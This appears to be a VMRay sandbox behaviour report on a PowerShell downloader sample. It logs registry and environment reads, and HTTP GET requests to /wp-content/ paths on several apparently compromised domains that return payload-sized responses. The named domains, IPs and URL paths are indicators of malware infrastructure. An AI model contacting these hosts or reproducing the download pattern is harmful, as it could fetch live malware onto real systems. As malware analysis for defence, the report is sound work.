Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine - True 2
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance - True 1
Fn
Open Key HKEY_CURRENT_USER - True 1
Fn
Open Key HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\CurrentVersion\Internet Settings - True 1
Fn
Open Key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds - True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ True 1
Fn
Read Value HKEY_CURRENT_USER\Environment value_name = PSMODULEPATH, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 6
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 6
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 3
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 3
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN value_name = StackVersion, data = 2.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = 0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ True 2
Fn
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion value_name = InstallationType, data = Client, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = 0, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = Library, data = netfxperf.dll, type = REG_SZ True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.NET CLR Networking\Performance value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = FileMappingSize, data = 131072, type = REG_DWORD_LITTLE_ENDIAN True 1
Fn
Read Value HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance value_name = Counter Names, type = REG_BINARY True 2
Fn
Data
Read Value HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds value_name = PipelineMaxStackSizeMB, type = REG_NONE False 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Keys HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Enumerate Values HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Get Key Info HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog - True 1
Fn
Module (4)
»
Operation Module Additional Information Success Count Logfile
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 2048 True 1
Fn
Get Filename - process_name = c:\windows\system32\windowspowershell\v1.0\powershell.exe, file_name_orig = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, size = 260 True 2
Fn
Create Mapping - filename = System Paging File, protection = PAGE_READWRITE, maximum_size = 131072 True 1
Fn
User (11)
»
Operation Additional Information Success Count Logfile
Lookup Privilege privilege = SeDebugPrivilege, luid = 20 True 1
Fn
Get Username user_name_out = aETAdzjz True 10
Fn
System (9)
»
Operation Additional Information Success Count Logfile
Open Certificate Store encoding_type = 65537, flags = 8708 True 1
Fn
Get Computer Name result_out = YKYD69Q True 1
Fn
Get Info type = Operating System True 4
Fn
Get Info type = SYSTEM_PROCESS_INFORMATION True 1
Fn
Get Network Adapter Info - False 1
Fn
Get Network Adapter Info - True 1
Fn
Mutex (11)
»
Operation Additional Information Success Count Logfile
Create mutex_name = Global\.net clr networking True 5
Fn
Release - True 1
Fn
Release mutex_name = Global\.net clr networking True 5
Fn
Environment (127)
»
Operation Additional Information Success Count Logfile
Get Environment String name = MshEnableTrace False 119
Fn
Get Environment String name = PSMODULEPATH, result_out = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Get Environment String name = HOMEDRIVE, result_out = C: True 1
Fn
Get Environment String name = HOMEPATH, result_out = \Users\aETAdzjz True 1
Fn
Get Environment String name = HomeDrive, result_out = C: True 1
Fn
Get Environment String name = HomePath, result_out = \Users\aETAdzjz True 1
Fn
Get Environment String name = userprofile, result_out = C:\Users\aETAdzjz True 2
Fn
Set Environment String name = PSMODULEPATH, value = C:\Users\aETAdzjz\Documents\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules\ True 1
Fn
Network Behavior
DNS (6)
»
Operation Additional Information Success Count Logfile
Resolve Name host = lesserassociates.com, address_out = 192.115.76.18 True 1
Fn
Resolve Name host = forexproservice.com, address_out = 80.172.234.15 True 1
Fn
Resolve Name host = host-services.com, address_out = 194.8.30.20 True 1
Fn
Resolve Name host = nieuwhoftegelwerken.nl, address_out = 195.8.208.98 True 1
Fn
Resolve Name host = uninortediverso.com, address_out = 104.31.93.251, 104.31.92.251 True 1
Fn
Resolve Name host = vigor-dragon.com, address_out = 47.89.211.238 True 1
Fn
TCP Sessions (1)
»
Information Value
Total Data Sent 0 bytes
Total Data Received 0 bytes
Contacted Host Count 1
Contacted Hosts 47.89.211.238
TCP Session #1
»
Information Value
Remote Address 47.89.211.238
Remote Port 443
Local Address 192.168.0.180
Local Port 49171
Data Sent 0 bytes
Data Received 0 bytes
Operation Additional Information Success Count Logfile
Create protocol = IPPROTO_TCP, address_family = AF_INET, type = SOCK_STREAM True 1
Fn
Connect remote_address = 47.89.211.238, remote_port = 443 True 1
Fn
Send flags = NO_FLAG_SET, size = 120, size_out = 120 True 1
Fn
Data
Receive flags = NO_FLAG_SET, size = 5, size_out = 0 True 1
Fn
Close type = SOCK_STREAM True 1
Fn
HTTP Sessions (4)
»
Information Value
Total Data Sent 324 bytes
Total Data Received 39.00 KB
Contacted Host Count 4
Contacted Hosts 192.115.76.18, 195.8.208.98, 194.8.30.20, 80.172.234.15
HTTP Session #1
»
Information Value
Server Name lesserassociates.com
Server Port 80
Username -
Password -
Data Sent 85 bytes
Data Received 31.86 KB
Operation Additional Information Success Count Logfile
Open Session - True 1
Fn
Open Connection protocol = http, server_name = lesserassociates.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /wp-content/E8h/ True 1
Fn
Send HTTP Request headers = Host: lesserassociates.com, Connection: Keep-Alive, url = lesserassociates.com/wp-content/E8h/ True 1
Fn
Data
Read Response size = 4096, size_out = 4096 True 1
Fn
Data
Read Response size = 1024, size_out = 1024 True 4
Fn
Data
Read Response size = 582, size_out = 582 True 1
Fn
Data
Read Response size = 2, size_out = 2 True 1
Fn
Data
Read Response size = 1, size_out = 1 True 6
Fn
Data
Read Response size = 1024, size_out = 1024 True 4
Fn
Data
Read Response size = 1024, size_out = 278 True 1
Fn
Data
Read Response size = 1024, size_out = 1024 True 3
Fn
Data
Read Response size = 746, size_out = 746 True 1
Fn
Data
Read Response size = 2, size_out = 2 True 1
Fn
Data
Read Response size = 1, size_out = 1 True 6
Fn
Data
Read Response size = 1024, size_out = 1024 True 8
Fn
Data
Read Response size = 2, size_out = 2 True 1
Fn
Data
Read Response size = 1, size_out = 1 True 6
Fn
Data
Read Response size = 1024, size_out = 554 True 1
Fn
Data
Read Response size = 1024, size_out = 1024 True 6
Fn
Data
Read Response size = 738, size_out = 738 True 1
Fn
Data
Read Response size = 2, size_out = 2 True 1
Fn
Data
Read Response size = 1, size_out = 1 True 3
Fn
Data
Read Response size = 2, size_out = 2 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #2
»
Information Value
Server Name forexproservice.com
Server Port 80
Username -
Password -
Data Sent 83 bytes
Data Received 499 bytes
Operation Additional Information Success Count Logfile
Open Session - True 1
Fn
Open Connection protocol = http, server_name = forexproservice.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /wp-content/tW/ True 1
Fn
Send HTTP Request headers = Host: forexproservice.com, Connection: Keep-Alive, url = forexproservice.com/wp-content/tW/ True 1
Fn
Data
Read Response size = 4096, size_out = 499 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #3
»
Information Value
Server Name host-services.com
Server Port 80
Username -
Password -
Data Sent 77 bytes
Data Received 1.73 KB
Operation Additional Information Success Count Logfile
Open Session - True 1
Fn
Open Connection protocol = http, server_name = host-services.com, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /suspended/ True 1
Fn
Send HTTP Request headers = Host: host-services.com, Connection: Keep-Alive, url = host-services.com/suspended/ True 1
Fn
Data
Read Response size = 4096, size_out = 278 True 1
Fn
Data
Read Response size = 1492, size_out = 1492 True 1
Fn
Data
Close Session - True 1
Fn
HTTP Session #4
»
Information Value
Server Name nieuwhoftegelwerken.nl
Server Port 80
Username -
Password -
Data Sent 79 bytes
Data Received 4.92 KB
Operation Additional Information Success Count Logfile
Open Session - True 1
Fn
Open Connection protocol = http, server_name = nieuwhoftegelwerken.nl, server_port = 80 True 1
Fn
Open HTTP Request http_verb = GET, http_version = HTTP/1.1, target_resource = /g9A/Wj/ True 1
Fn
Send HTTP Request headers = Host: nieuwhoftegelwerken.nl, Connection: Keep-Alive, url = nieuwhoftegelwerken.nl/g9A/Wj/ True 1
Fn
Data
Read Response size = 4096, size_out = 4096 True 1
Fn
Data
Read Response size = 947, size_out = 947 True 1
Fn
Data
Close Session - True 1
Fn
Function Logfile
Download-Icon
Exit-Icon

This feature requires an online-connection to the VMRay backend.

An offline version with limited functionality is also provided.
The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy". 


    

   

   

    Before
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    After
   

   

    

     

      
       This feature requires an online-connection to the VMRay backend.
      
      

      

      An offline version with limited functionality is also provided.
      

      The offline version is supported only in Mozilla Firefoxwith deactivated setting "security.fileuri.strict_origin_policy".
     

     

    

   

   

    

     
      

       
       
       
       
      

     
     
     
    

   

  

  

   

    
    

     Screenshot
    

    

     Expand-Icon
    

    

     Exit-Icon
    

   

   

    

     icon_left
    

    

     icon_left
    

   

   

   

   

    image